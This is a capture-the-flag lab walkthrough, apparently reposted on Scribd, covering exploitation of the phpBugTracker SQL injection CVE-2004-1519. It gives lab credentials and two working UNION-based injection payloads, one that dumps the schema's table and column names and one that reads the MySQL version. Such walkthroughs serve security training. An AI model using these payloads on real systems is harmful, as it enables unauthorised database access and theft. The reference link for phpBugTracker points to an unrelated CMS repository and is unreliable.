Scribd
Upload
4 views

phpBugTracker SQL injection CVE-2004-1519

The document outlines the steps to exploit the vulnerability CVE-2004-1519 in a web application. It provides a series of commands and URLs for inspecting the application, authenticating, and executing SQL injection to dump the database and retrieve MySQL version information. Important references and credentials for the challenge are also included.

Uploaded by

slashnata07
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
4 views

phpBugTracker SQL injection CVE-2004-1519

The document outlines the steps to exploit the vulnerability CVE-2004-1519 in a web application. It provides a series of commands and URLs for inspecting the application, authenticating, and executing SQL injection to dump the database and retrieve MySQL version information. Important references and credentials for the challenge are also included.

Uploaded by

slashnata07
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

Name CVE-2004-1519

URL https://www.attackdefense.com/challengedetails?cid=376

Type Webapp CVEs : 2004

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Solution:

The web application is vulnerable to CVE-2004-1519

Step 1: ​Inspect the web application.


Step 2: ​Search on google “CVE-2004-1519”.

The exploit db link contains the steps to be followed to exploit the vulnerability.

Exploit DB Link: ​https://www.exploit-db.com/exploits/36160


Step 3: ​The user has to authenticate in order to exploit the vulnerability. Credentials are
provided in the challenge description.

Credentials:
● Email: ​[email protected]
● Password:​ ​password

URL: ​http://lu2gr8pn6c5t60xp9pr2125n9.mumbaix.attackdefenselabs.com/index.php
Admin Dashboard:

Step 4: ​Navigate to the vulnerable page provided at exploit-db.

URL:
http://lu2gr8pn6c5t60xp9pr2125n9.mumbaix.attackdefenselabs.com/bug.php?op=add&project=
1
Step 5: ​Inject the payload to dump the database.

Payload: ​1'
union+select+(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)wh
ere(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)+--+

URL:
http://lu2gr8pn6c5t60xp9pr2125n9.mumbaix.attackdefenselabs.com/bug.php?op=add&project=
1%27%20union+select+(select(@)from(select(@:=0x00),(select(@)from(information_schema.c
olumns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)+--+

Step 6: ​Create a query to dump mysql version running on the target.

Payload: ​1%27%20union+select+version()+--+

URL:
http://lu2gr8pn6c5t60xp9pr2125n9.mumbaix.attackdefenselabs.com/bug.php?op=add&project=
1%27%20union+select+version()+--+
The SQL injection attack was successful and as a result, the MySQL version information was
dumped on the webpage.

References:

1. phpBugTracker (​https://github.com/philippe/FrogCMS​)
2. CVE-2004-1519 (​https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519​)
3. phpBugTracker 1.6.0 - Multiple Vulnerabilities
(​https://www.exploit-db.com/exploits/36160​)

You might also like